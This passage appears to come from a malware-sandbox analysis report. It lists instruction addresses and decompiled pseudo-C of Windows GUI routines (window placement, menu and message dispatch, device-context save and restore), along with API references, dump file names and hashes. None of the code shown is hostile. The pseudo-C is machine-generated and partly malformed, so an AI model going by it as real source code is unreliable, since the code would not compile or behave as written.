                                  0x0044752b
                                  0x0044752c
                                  0x00447531
                                  0x00447534
                                  0x0044753e
                                  0x00447544
                                  0x00447547
                                  0x0044754e
                                  0x004478f2
                                  0x004478f3
                                  0x004478f8
                                  0x004478fb
                                  0x00447905
                                  0x0044790f
                                  0x0044792b
                                  0x00447933
                                  0x00447936
                                  0x00447938
                                  0x0044793d
                                  0x0044793d
                                  0x00447942
                                  0x00447945
                                  0x0044794c
                                  0x0044795b
                                  0x0044795e
                                  0x00447965
                                  0x00447986
                                  0x0044798b
                                  0x00447992
                                  0x00447997
                                  0x00447999
                                  0x004479a4
                                  0x004479a9
                                  0x004479ab
                                  0x004479ba
                                  0x004479ba
                                  0x004479ab
                                  0x004479bc
                                  0x004479be
                                  0x004479f0
                                  0x004479c0
                                  0x004479d8
                                  0x004479de
                                  0x004479de
                                  0x00447967
                                  0x0044797f
                                  0x0044797f
                                  0x0044794e
                                  0x00447951
                                  0x00447951
                                  0x00447554
                                  0x00447556
                                  0x00447557
                                  0x0044755c
                                  0x0044755f
                                  0x00447569
                                  0x00447573
                                  0x00447599
                                  0x004475c5
                                  0x0044760e
                                  0x0044760e
                                  0x00447611
                                  0x00447613
                                  0x00447615
                                  0x00447615
                                  0x00447625
                                  0x00447625
                                  0x00447628
                                  0x0044762a
                                  0x0044762c
                                  0x0044762c
                                  0x004475c7
                                  0x004475c7
                                  0x004475d9
                                  0x004475dc
                                  0x004475de
                                  0x004475e0
                                  0x004475e0
                                  0x004475e3
                                  0x004475f3
                                  0x004475f6
                                  0x004475f8
                                  0x004475fa
                                  0x004475fa
                                  0x004475f8
                                  0x00447631
                                  0x00447633
                                  0x00447633
                                  0x00447637
                                  0x00447639
                                  0x00447639
                                  0x00447649
                                  0x00447652
                                  0x0044765f
                                  0x00447668
                                  0x00447668
                                  0x00447672
                                  0x00447675
                                  0x00447680
                                  0x00447683
                                  0x00447757
                                  0x00447759
                                  0x0044775f
                                  0x00447762
                                  0x00447769
                                  0x004477b2
                                  0x004477b2
                                  0x004477b5
                                  0x004477b7
                                  0x004477b9
                                  0x004477b9
                                  0x004477c9
                                  0x004477c9
                                  0x004477cc
                                  0x004477ce
                                  0x004477d0
                                  0x004477d0
                                  0x0044776b
                                  0x0044776b
                                  0x0044777d
                                  0x0044777d
                                  0x00447780
                                  0x00447782
                                  0x00447784
                                  0x00447784
                                  0x00447787
                                  0x00447797
                                  0x00447797
                                  0x0044779a
                                  0x0044779c
                                  0x0044779e
                                  0x0044779e
                                  0x0044779c
                                  0x004477d3
                                  0x004477d5
                                  0x004477d7
                                  0x004477d7
                                  0x004477d7
                                  0x004477d9
                                  0x004477db
                                  0x004477dd
                                  0x004477dd
                                  0x004477dd
                                  0x004477f6
                                  0x004477f6
                                  0x00447689
                                  0x00447689
                                  0x0044768e
                                  0x00447691
                                  0x00447694
                                  0x0044769b
                                  0x004476a3
                                  0x004476a9
                                  0x004476ae
                                  0x004476b0
                                  0x004476b5
                                  0x004476b5
                                  0x004476b0
                                  0x004476b8
                                  0x004476ba
                                  0x004476f3
                                  0x004476f3
                                  0x004476f6
                                  0x004476f8
                                  0x004476fa
                                  0x004476fa
                                  0x0044770a
                                  0x0044770a
                                  0x0044770d
                                  0x0044770f
                                  0x00447711
                                  0x00447711
                                  0x004476bc
                                  0x004476c2
                                  0x004476c2
                                  0x004476c5
                                  0x004476c7
                                  0x004476c9
                                  0x004476c9
                                  0x004476cc
                                  0x004476d5
                                  0x004476d5
                                  0x004476d8
                                  0x004476da
                                  0x004476dc
                                  0x004476dc
                                  0x004476df
                                  0x004476df
                                  0x00447714
                                  0x00447716
                                  0x00447718
                                  0x00447718
                                  0x00447718
                                  0x0044771a
                                  0x0044771c
                                  0x0044771e
                                  0x0044771e
                                  0x0044771e
                                  0x0044772e
                                  0x00447737
                                  0x0044773d
                                  0x00447740
                                  0x00447744
                                  0x0044774d
                                  0x0044774d
                                  0x00447744
                                  0x00447683
                                  0x004477ff
                                  0x00447810
                                  0x004478e6
                                  0x00447816
                                  0x00447820
                                  0x00447873
                                  0x00447887
                                  0x00447887
                                  0x0044789c
                                  0x004478a4
                                  0x00447822
                                  0x00447827
                                  0x00447832
                                  0x00447841
                                  0x00447851
                                  0x00447851
                                  0x004478b2
                                  0x004478c1
                                  0x004478c1
                                  0x00447810
                                  0x0044754e
                                  0x004479f7
                                  0x004479fa
                                  0x004479fd
                                  0x00447a02
                                  0x00447a05
                                  0x00447a0c

                                  APIs
                                  • SendMessageA.USER32(?,00000223,00000000,00000000), ref: 00447841
                                    • Part of subcall function 00405910: LoadStringA.USER32 ref: 00405941
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: LoadMessageSendString
                                  • String ID:
                                  • API String ID: 1946433856-0
                                  • Opcode ID: ad1222f94e0213ba0134336c71fa07fef18579c8ec54a72a30f658754ae220c5
                                  • Instruction ID: 3aa98c2587dad14828a5119e9969fbe688d1a32f0099da2cdc317963c0a8b1b0
                                  • Opcode Fuzzy Hash: ad1222f94e0213ba0134336c71fa07fef18579c8ec54a72a30f658754ae220c5
                                  • Instruction Fuzzy Hash: 88F16D35A04644EFEB00DFA9CA95B9E77F5AF05304F5501BAE500AB3A2D778BE01DB48
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00432810, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 75%
                                  			E00432810(void* __eax) {
				void* _v28;
				struct _WINDOWPLACEMENT _v56;
				struct tagPOINT _v64;
				intOrPtr _v68;
				void* _t43;
				struct HWND__* _t45;
				struct tagPOINT* _t47;

				_t47 =  &(_v64.y);
				_t43 = __eax;
				if(IsIconic( *(__eax + 0x180)) == 0) {
					GetWindowRect( *(_t43 + 0x180), _t47);
				} else {
					_v56.length = 0x2c;
					GetWindowPlacement( *(_t43 + 0x180),  &_v56);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if((GetWindowLongA( *(_t43 + 0x180), 0xfffffff0) & 0x40000000) != 0) {
					_t45 = GetWindowLongA( *(_t43 + 0x180), 0xfffffff8);
					if(_t45 != 0) {
						ScreenToClient(_t45, _t47);
						ScreenToClient(_t45,  &_v64);
					}
				}
				 *(_t43 + 0x40) = _t47->x;
				 *((intOrPtr*)(_t43 + 0x44)) = _v68;
				 *((intOrPtr*)(_t43 + 0x48)) = _v64.x - _t47->x;
				 *((intOrPtr*)(_t43 + 0x4c)) = _v64.y.x - _v68;
				return E0042B544(_t43);
			}










                                  0x00432813
                                  0x00432816
                                  0x00432826
                                  0x00432855
                                  0x00432828
                                  0x00432828
                                  0x0043283c
                                  0x00432847
                                  0x00432848
                                  0x00432849
                                  0x0043284a
                                  0x0043284a
                                  0x0043286d
                                  0x0043287d
                                  0x00432881
                                  0x00432885
                                  0x00432890
                                  0x00432890
                                  0x00432881
                                  0x00432898
                                  0x0043289f
                                  0x004328a9
                                  0x004328b4
                                  0x004328c4

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Window$ClientLongScreen$IconicPlacementRect
                                  • String ID: ,
                                  • API String ID: 2266315723-3772416878
                                  • Opcode ID: 940657ae7acb0d9bb828cddbfd4ebf674a7418cb316be1fa9443a139bba893c4
                                  • Instruction ID: da3091b49873e7d1aa76414d81980a81db688202fe5137eeea3dbb1a6e120157
                                  • Opcode Fuzzy Hash: 940657ae7acb0d9bb828cddbfd4ebf674a7418cb316be1fa9443a139bba893c4
                                  • Instruction Fuzzy Hash: 3A118E71500210AFCB01EE6DC885A8B37E8AF4D314F184A7EFD58DB285EB39D9148BA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0043F764, Relevance: 10.9, APIs: 7, Instructions: 405nativeCOMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 91%
                                  			E0043F764(intOrPtr __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				struct HMENU__* _v12;
				signed int _v16;
				char _v17;
				intOrPtr _v24;
				int _v28;
				struct HDC__* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr* _v48;
				char _v52;
				intOrPtr _t137;
				signed int _t138;
				intOrPtr _t144;
				signed int _t150;
				signed int _t151;
				intOrPtr* _t153;
				void* _t158;
				struct HMENU__* _t160;
				intOrPtr* _t165;
				void* _t173;
				signed int _t177;
				signed int _t181;
				void* _t182;
				void* _t214;
				struct HDC__* _t221;
				void* _t251;
				signed int _t257;
				void* _t265;
				signed int _t271;
				signed int _t272;
				signed int _t274;
				signed int _t275;
				signed int _t277;
				signed int _t278;
				signed int _t280;
				signed int _t281;
				signed int _t283;
				signed int _t284;
				signed int _t286;
				signed int _t287;
				signed int _t290;
				signed int _t291;
				intOrPtr _t307;
				intOrPtr _t311;
				intOrPtr _t333;
				intOrPtr _t342;
				intOrPtr _t346;
				intOrPtr* _t353;
				signed int _t355;
				intOrPtr* _t356;
				signed int _t367;
				signed int _t368;
				signed int _t369;
				signed int _t370;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				intOrPtr* _t375;
				void* _t377;
				void* _t378;
				intOrPtr _t379;
				void* _t380;

				_t377 = _t378;
				_t379 = _t378 + 0xffffffd0;
				_v52 = 0;
				_t375 = __edx;
				_v8 = __eax;
				_push(_t377);
				_push(0x43fc97);
				_push( *[fs:eax]);
				 *[fs:eax] = _t379;
				_t137 =  *__edx;
				_t380 = _t137 - 0x111;
				if(_t380 > 0) {
					_t138 = _t137 - 0x117;
					__eflags = _t138;
					if(_t138 == 0) {
						_t271 =  *((intOrPtr*)(_v8 + 8)) - 1;
						__eflags = _t271;
						if(_t271 < 0) {
							goto L67;
						} else {
							_t272 = _t271 + 1;
							_t367 = 0;
							__eflags = 0;
							while(1) {
								_t150 = E0043EB10(E00413524(_v8, _t367),  *(_t375 + 4), __eflags);
								__eflags = _t150;
								if(_t150 != 0) {
									goto L68;
								}
								_t367 = _t367 + 1;
								_t272 = _t272 - 1;
								__eflags = _t272;
								if(_t272 != 0) {
									continue;
								} else {
									goto L67;
								}
								goto L68;
							}
						}
					} else {
						_t151 = _t138 - 8;
						__eflags = _t151;
						if(_t151 == 0) {
							_v17 = 0;
							__eflags =  *(__edx + 6) & 0x00000010;
							if(( *(__edx + 6) & 0x00000010) != 0) {
								_v17 = 1;
							}
							_t274 =  *((intOrPtr*)(_v8 + 8)) - 1;
							__eflags = _t274;
							if(__eflags < 0) {
								L32:
								_t153 =  *0x44dfb8; // 0x44fbb0
								E0044BA64( *_t153, 0, __eflags);
								goto L67;
							} else {
								_t275 = _t274 + 1;
								_t368 = 0;
								__eflags = 0;
								while(1) {
									__eflags = _v17 - 1;
									if(_v17 != 1) {
										_v12 =  *(_t375 + 4) & 0x0000ffff;
									} else {
										_t160 =  *(_t375 + 8);
										__eflags = _t160;
										if(_t160 == 0) {
											_v12 = 0xffffffff;
										} else {
											_v12 = GetSubMenu(_t160,  *(_t375 + 4) & 0x0000ffff);
										}
									}
									_t158 = E00413524(_v8, _t368);
									_t295 = _v17;
									_v16 = E0043EA54(_t158, _v17, _v12);
									__eflags = _v16;
									if(__eflags != 0) {
										break;
									}
									_t368 = _t368 + 1;
									_t275 = _t275 - 1;
									__eflags = _t275;
									if(__eflags != 0) {
										continue;
									} else {
										goto L32;
									}
									goto L68;
								}
								E00429054( *((intOrPtr*)(_v16 + 0x58)), _t295,  &_v52, __eflags);
								_t165 =  *0x44dfb8; // 0x44fbb0
								E0044BA64( *_t165, _v52, __eflags);
							}
						} else {
							__eflags = _t151 == 1;
							if(_t151 == 1) {
								_t277 =  *((intOrPtr*)(_v8 + 8)) - 1;
								__eflags = _t277;
								if(_t277 < 0) {
									goto L67;
								} else {
									_t278 = _t277 + 1;
									_t369 = 0;
									__eflags = 0;
									while(1) {
										_v48 = E00413524(_v8, _t369);
										_t173 =  *((intOrPtr*)( *_v48 + 0x34))();
										__eflags = _t173 -  *(_t375 + 8);
										if(_t173 ==  *(_t375 + 8)) {
											break;
										}
										_t177 = E0043EA54(_v48, 1,  *(_t375 + 8));
										__eflags = _t177;
										if(_t177 == 0) {
											_t369 = _t369 + 1;
											_t278 = _t278 - 1;
											__eflags = _t278;
											if(_t278 != 0) {
												continue;
											} else {
												goto L67;
											}
										} else {
											break;
										}
										goto L68;
									}
									E0043F354(_v48, _t375);
								}
							} else {
								goto L67;
							}
						}
					}
					goto L68;
				} else {
					if(_t380 == 0) {
						_t280 =  *((intOrPtr*)(_v8 + 8)) - 1;
						__eflags = _t280;
						if(_t280 < 0) {
							goto L67;
						} else {
							_t281 = _t280 + 1;
							_t370 = 0;
							__eflags = 0;
							while(1) {
								E00413524(_v8, _t370);
								_t181 = E0043EAF4( *(_t375 + 4), __eflags);
								__eflags = _t181;
								if(_t181 != 0) {
									goto L68;
								}
								_t370 = _t370 + 1;
								_t281 = _t281 - 1;
								__eflags = _t281;
								if(_t281 != 0) {
									continue;
								} else {
									goto L67;
								}
								goto L68;
							}
						}
						goto L68;
					} else {
						_t182 = _t137 - 0x2b;
						if(_t182 == 0) {
							_v40 =  *((intOrPtr*)(__edx + 8));
							_t283 =  *((intOrPtr*)(_v8 + 8)) - 1;
							__eflags = _t283;
							if(_t283 < 0) {
								goto L67;
							} else {
								_t284 = _t283 + 1;
								_t371 = 0;
								__eflags = 0;
								while(1) {
									_v16 = E0043EA54(E00413524(_v8, _t371), 0,  *((intOrPtr*)(_v40 + 8)));
									__eflags = _v16;
									if(_v16 != 0) {
										break;
									}
									_t371 = _t371 + 1;
									_t284 = _t284 - 1;
									__eflags = _t284;
									if(_t284 != 0) {
										continue;
									} else {
										goto L67;
									}
									goto L69;
								}
								_v24 = E0041C81C(0, 1);
								_push(_t377);
								_push(0x43faca);
								_push( *[fs:eax]);
								 *[fs:eax] = _t379;
								_v28 = SaveDC( *(_v40 + 0x18));
								_push(_t377);
								_push(0x43faad);
								_push( *[fs:eax]);
								 *[fs:eax] = _t379;
								E0041CDD8(_v24,  *(_v40 + 0x18));
								E0041CC78(_v24);
								E0043FF3C(_v16, _v40 + 0x1c, _v24,  *((intOrPtr*)(_v40 + 0x10)));
								_pop(_t333);
								 *[fs:eax] = _t333;
								_push(0x43fab4);
								__eflags = 0;
								E0041CDD8(_v24, 0);
								return RestoreDC( *(_v40 + 0x18), _v28);
							}
						} else {
							_t214 = _t182 - 1;
							if(_t214 == 0) {
								_v44 =  *((intOrPtr*)(__edx + 8));
								_t286 =  *((intOrPtr*)(_v8 + 8)) - 1;
								__eflags = _t286;
								if(_t286 < 0) {
									goto L67;
								} else {
									_t287 = _t286 + 1;
									_t372 = 0;
									__eflags = 0;
									while(1) {
										_v16 = E0043EA54(E00413524(_v8, _t372), 0,  *((intOrPtr*)(_v44 + 8)));
										__eflags = _v16;
										if(_v16 != 0) {
											break;
										}
										_t372 = _t372 + 1;
										_t287 = _t287 - 1;
										__eflags = _t287;
										if(_t287 != 0) {
											continue;
										} else {
											goto L67;
										}
										goto L69;
									}
									_t221 =  *((intOrPtr*)(_v8 + 0x10));
									L004063B8();
									_v32 = _t221;
									 *[fs:eax] = _t379;
									_v24 = E0041C81C(0, 1);
									 *[fs:eax] = _t379;
									_v28 = SaveDC(_v32);
									 *[fs:eax] = _t379;
									E0041CDD8(_v24, _v32);
									E0041CC78(_v24);
									 *((intOrPtr*)( *_v16 + 0x38))(_v44 + 0x10,  *[fs:eax], 0x43fbcb, _t377,  *[fs:eax], 0x43fbe8, _t377,  *[fs:eax], 0x43fc0d, _t377, _t221);
									_pop(_t342);
									 *[fs:eax] = _t342;
									_push(0x43fbd2);
									__eflags = 0;
									E0041CDD8(_v24, 0);
									return RestoreDC(_v32, _v28);
								}
							} else {
								if(_t214 == 0x27) {
									_v36 =  *((intOrPtr*)(__edx + 8));
									_t290 =  *((intOrPtr*)(_v8 + 8)) - 1;
									__eflags = _t290;
									if(_t290 < 0) {
										goto L67;
									} else {
										_t291 = _t290 + 1;
										_t373 = 0;
										__eflags = 0;
										while(1) {
											_t251 =  *((intOrPtr*)( *((intOrPtr*)(E00413524(_v8, _t373))) + 0x34))();
											_t346 = _v36;
											__eflags = _t251 -  *((intOrPtr*)(_t346 + 0xc));
											if(_t251 !=  *((intOrPtr*)(_t346 + 0xc))) {
												_v16 = E0043EA54(E00413524(_v8, _t373), 1,  *((intOrPtr*)(_v36 + 0xc)));
											} else {
												_v16 =  *((intOrPtr*)(E00413524(_v8, _t373) + 0x34));
											}
											__eflags = _v16;
											if(_v16 != 0) {
												break;
											}
											_t373 = _t373 + 1;
											_t291 = _t291 - 1;
											__eflags = _t291;
											if(_t291 != 0) {
												continue;
											} else {
												goto L67;
											}
											goto L68;
										}
										_t257 = E0043EA84(E00413524(_v8, _t373), 1,  *((intOrPtr*)(_v36 + 8)));
										__eflags = _t257;
										if(_t257 == 0) {
											_t265 = E00413524(_v8, _t373);
											__eflags = 0;
											_t257 = E0043EA84(_t265, 0,  *((intOrPtr*)(_v36 + 0xc)));
										}
										_t353 =  *0x44e0ec; // 0x44fbb4
										_t355 =  *( *_t353 + 0x6c);
										__eflags = _t355;
										if(_t355 != 0) {
											__eflags = _t257;
											if(_t257 == 0) {
												_t257 =  *(_t355 + 0x158);
											}
											_t307 =  *0x44e0ec; // 0x44fbb4
											__eflags =  *(_t355 + 0x228) & 0x00000008;
											if(( *(_t355 + 0x228) & 0x00000008) == 0) {
												_t356 =  *0x44dfb8; // 0x44fbb0
												E0044B708( *_t356, _t291, _t307, _t257, _t373, _t375);
											} else {
												E0044B770();
											}
										}
									}
								} else {
									L67:
									_push( *(_t375 + 8));
									_push( *(_t375 + 4));
									_push( *_t375);
									_t144 =  *((intOrPtr*)(_v8 + 0x10));
									_push(_t144);
									L004061D0();
									 *((intOrPtr*)(_t375 + 0xc)) = _t144;
								}
								L68:
								_pop(_t311);
								 *[fs:eax] = _t311;
								_push(0x43fc9e);
								return E00403E10( &_v52);
							}
						}
					}
				}
				L69:
			}



































































                                  0x0043f765
                                  0x0043f767
                                  0x0043f76f
                                  0x0043f772
                                  0x0043f774
                                  0x0043f779
                                  0x0043f77a
                                  0x0043f77f
                                  0x0043f782
                                  0x0043f785
                                  0x0043f787
                                  0x0043f78c
                                  0x0043f7ae
                                  0x0043f7ae
                                  0x0043f7b3
                                  0x0043f802
                                  0x0043f803
                                  0x0043f805
                                  0x00000000
                                  0x0043f80b
                                  0x0043f80b
                                  0x0043f80c
                                  0x0043f80c
                                  0x0043f80e
                                  0x0043f81b
                                  0x0043f820
                                  0x0043f822
                                  0x00000000
                                  0x00000000
                                  0x0043f828
                                  0x0043f829
                                  0x0043f829
                                  0x0043f82a
                                  0x00000000
                                  0x0043f82c
                                  0x00000000
                                  0x0043f82c
                                  0x00000000
                                  0x0043f82a
                                  0x0043f80e
                                  0x0043f7b5
                                  0x0043f7b5
                                  0x0043f7b5
                                  0x0043f7b8
                                  0x0043f831
                                  0x0043f835
                                  0x0043f839
                                  0x0043f83b
                                  0x0043f83b
                                  0x0043f845
                                  0x0043f846
                                  0x0043f848
                                  0x0043f8be
                                  0x0043f8be
                                  0x0043f8c7
                                  0x00000000
                                  0x0043f84a
                                  0x0043f84a
                                  0x0043f84b
                                  0x0043f84b
                                  0x0043f84d
                                  0x0043f84d
                                  0x0043f851
                                  0x0043f877
                                  0x0043f853
                                  0x0043f853
                                  0x0043f856
                                  0x0043f858
                                  0x0043f86a
                                  0x0043f85a
                                  0x0043f865
                                  0x0043f865
                                  0x0043f858
                                  0x0043f87f
                                  0x0043f884
                                  0x0043f88f
                                  0x0043f892
                                  0x0043f896
                                  0x00000000
                                  0x00000000
                                  0x0043f8ba
                                  0x0043f8bb
                                  0x0043f8bb
                                  0x0043f8bc
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0043f8bc
                                  0x0043f8a1
                                  0x0043f8a9
                                  0x0043f8b0
                                  0x0043f8b0
                                  0x0043f7ba
                                  0x0043f7ba
                                  0x0043f7bb
                                  0x0043fc24
                                  0x0043fc25
                                  0x0043fc27
                                  0x00000000
                                  0x0043fc29
                                  0x0043fc29
                                  0x0043fc2a
                                  0x0043fc2a
                                  0x0043fc2c
                                  0x0043fc36
                                  0x0043fc3e
                                  0x0043fc41
                                  0x0043fc44
                                  0x00000000
                                  0x00000000
                                  0x0043fc4e
                                  0x0043fc53
                                  0x0043fc55
                                  0x0043fc63
                                  0x0043fc64
                                  0x0043fc64
                                  0x0043fc65
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0043fc55
                                  0x0043fc5c
                                  0x0043fc5c
                                  0x0043f7c1
                                  0x00000000
                                  0x0043f7c1
                                  0x0043f7bb
                                  0x0043f7b8
                                  0x00000000
                                  0x0043f78e
                                  0x0043f78e
                                  0x0043f7cc
                                  0x0043f7cd
                                  0x0043f7cf
                                  0x00000000
                                  0x0043f7d5
                                  0x0043f7d5
                                  0x0043f7d6
                                  0x0043f7d6
                                  0x0043f7d8
                                  0x0043f7dd
                                  0x0043f7e6
                                  0x0043f7eb
                                  0x0043f7ed
                                  0x00000000
                                  0x00000000
                                  0x0043f7f3
                                  0x0043f7f4
                                  0x0043f7f4
                                  0x0043f7f5
                                  0x00000000
                                  0x0043f7f7
                                  0x00000000
                                  0x0043f7f7
                                  0x00000000
                                  0x0043f7f5
                                  0x0043f7d8
                                  0x00000000
                                  0x0043f790
                                  0x0043f790
                                  0x0043f793
                                  0x0043f9d6
                                  0x0043f9df
                                  0x0043f9e0
                                  0x0043f9e2
                                  0x00000000
                                  0x0043f9e8
                                  0x0043f9e8
                                  0x0043f9e9
                                  0x0043f9e9
                                  0x0043f9eb
                                  0x0043fa02
                                  0x0043fa05
                                  0x0043fa09
                                  0x00000000
                                  0x00000000
                                  0x0043fad1
                                  0x0043fad2
                                  0x0043fad2
                                  0x0043fad3
                                  0x00000000
                                  0x0043fad9
                                  0x00000000
                                  0x0043fad9
                                  0x00000000
                                  0x0043fad3
                                  0x0043fa1b
                                  0x0043fa20
                                  0x0043fa21
                                  0x0043fa26
                                  0x0043fa29
                                  0x0043fa38
                                  0x0043fa3d
                                  0x0043fa3e
                                  0x0043fa43
                                  0x0043fa46
                                  0x0043fa52
                                  0x0043fa67
                                  0x0043fa80
                                  0x0043fa87
                                  0x0043fa8a
                                  0x0043fa8d
                                  0x0043fa92
                                  0x0043fa97
                                  0x0043faac
                                  0x0043faac
                                  0x0043f799
                                  0x0043f799
                                  0x0043f79a
                                  0x0043fae1
                                  0x0043faea
                                  0x0043faeb
                                  0x0043faed
                                  0x00000000
                                  0x0043faf3
                                  0x0043faf3
                                  0x0043faf4
                                  0x0043faf4
                                  0x0043faf6
                                  0x0043fb0d
                                  0x0043fb10
                                  0x0043fb14
                                  0x00000000
                                  0x00000000
                                  0x0043fc14
                                  0x0043fc15
                                  0x0043fc15
                                  0x0043fc16
                                  0x00000000
                                  0x0043fc1c
                                  0x00000000
                                  0x0043fc1c
                                  0x00000000
                                  0x0043fc16
                                  0x0043fb1d
                                  0x0043fb21
                                  0x0043fb26
                                  0x0043fb34
                                  0x0043fb43
                                  0x0043fb51
                                  0x0043fb5d
                                  0x0043fb6b
                                  0x0043fb74
                                  0x0043fb89
                                  0x0043fba3
                                  0x0043fba8
                                  0x0043fbab
                                  0x0043fbae
                                  0x0043fbb3
                                  0x0043fbb8
                                  0x0043fbca
                                  0x0043fbca
                                  0x0043f7a0
                                  0x0043f7a3
                                  0x0043f8d4
                                  0x0043f8dd
                                  0x0043f8de
                                  0x0043f8e0
                                  0x00000000
                                  0x0043f8e6
                                  0x0043f8e6
                                  0x0043f8e7
                                  0x0043f8e7
                                  0x0043f8e9
                                  0x0043f8f5
                                  0x0043f8f8
                                  0x0043f8fb
                                  0x0043f8fe
                                  0x0043f929
                                  0x0043f900
                                  0x0043f90d
                                  0x0043f90d
                                  0x0043f92c
                                  0x0043f930
                                  0x00000000
                                  0x00000000
                                  0x0043f9c6
                                  0x0043f9c7
                                  0x0043f9c7
                                  0x0043f9c8
                                  0x00000000
                                  0x0043f9ce
                                  0x00000000
                                  0x0043f9ce
                                  0x00000000
                                  0x0043f9c8
                                  0x0043f948
                                  0x0043f94d
                                  0x0043f94f
                                  0x0043f956
                                  0x0043f961
                                  0x0043f963
                                  0x0043f963
                                  0x0043f968
                                  0x0043f970
                                  0x0043f973
                                  0x0043f975
                                  0x0043f97b
                                  0x0043f97d
                                  0x0043f984
                                  0x0043f984
                                  0x0043f98a
                                  0x0043f990
                                  0x0043f997
                                  0x0043f9b3
                                  0x0043f9bc
                                  0x0043f999
                                  0x0043f9a9
                                  0x0043f9a9
                                  0x0043f997
                                  0x0043f975
                                  0x0043f7a9
                                  0x0043fc67
                                  0x0043fc6a
                                  0x0043fc6e
                                  0x0043fc71
                                  0x0043fc75
                                  0x0043fc78
                                  0x0043fc79
                                  0x0043fc7e
                                  0x0043fc7e
                                  0x0043fc81
                                  0x0043fc83
                                  0x0043fc86
                                  0x0043fc89
                                  0x0043fc96
                                  0x0043fc96
                                  0x0043f79a
                                  0x0043f793
                                  0x0043f78e
                                  0x00000000

                                  APIs
                                  • SaveDC.GDI32(?), ref: 0043FA33
                                  • RestoreDC.GDI32(?,?), ref: 0043FAA7
                                  • 72E7B080.USER32(?,00000000,0043FC97), ref: 0043FB21
                                  • SaveDC.GDI32(?), ref: 0043FB58
                                  • RestoreDC.GDI32(?,?), ref: 0043FBC5
                                  • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,0043FC97), ref: 0043FC79
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: RestoreSave$B080NtdllProc_Window
                                  • String ID:
                                  • API String ID: 4024241980-0
                                  • Opcode ID: 6bd54ce8a790ba2b91da0f438a2b66d8d9663673e015c4bf75d58f247bffaec7
                                  • Instruction ID: f51fcd96bcfc0ac8f3d666de58dc3418fc0fcc0aeffc3f25c7b0c37663b036d6
                                  • Opcode Fuzzy Hash: 6bd54ce8a790ba2b91da0f438a2b66d8d9663673e015c4bf75d58f247bffaec7
                                  • Instruction Fuzzy Hash: 6FE12674A042099BDB10EFAAC88199AB7F5FF4C304F25A5A6E805A7361C738ED45CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00444908, Relevance: 9.3, APIs: 6, Instructions: 284windowCOMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 92%
                                  			E00444908(intOrPtr __eax, struct HWND__** __edx) {
				intOrPtr _v8;
				int _v12;
				intOrPtr _v16;
				struct HDC__* _v20;
				struct HWND__* _v24;
				void* __ebp;
				struct HWND__* _t92;
				intOrPtr _t112;
				intOrPtr _t115;
				struct HWND__* _t121;
				struct HWND__* _t124;
				intOrPtr _t128;
				struct HWND__* _t129;
				intOrPtr _t130;
				intOrPtr _t131;
				struct HWND__* _t133;
				struct HWND__* _t136;
				intOrPtr _t142;
				intOrPtr _t172;
				struct HDC__* _t177;
				struct HWND__** _t200;
				struct HWND__* _t218;
				struct HWND__* _t219;
				intOrPtr _t228;
				void* _t230;
				void* _t231;
				intOrPtr _t237;
				intOrPtr _t245;
				struct HWND__* _t249;
				struct HWND__* _t250;
				struct HWND__* _t255;
				struct HWND__* _t256;
				void* _t258;
				void* _t260;
				intOrPtr _t261;
				void* _t263;
				void* _t267;

				_t258 = _t260;
				_t261 = _t260 + 0xffffffec;
				_t200 = __edx;
				_v8 = __eax;
				_t92 =  *__edx;
				_t218 = _t92;
				_t263 = _t218 - 0x46;
				if(_t263 > 0) {
					_t219 = _t218 - 0xb01a;
					__eflags = _t219;
					if(_t219 == 0) {
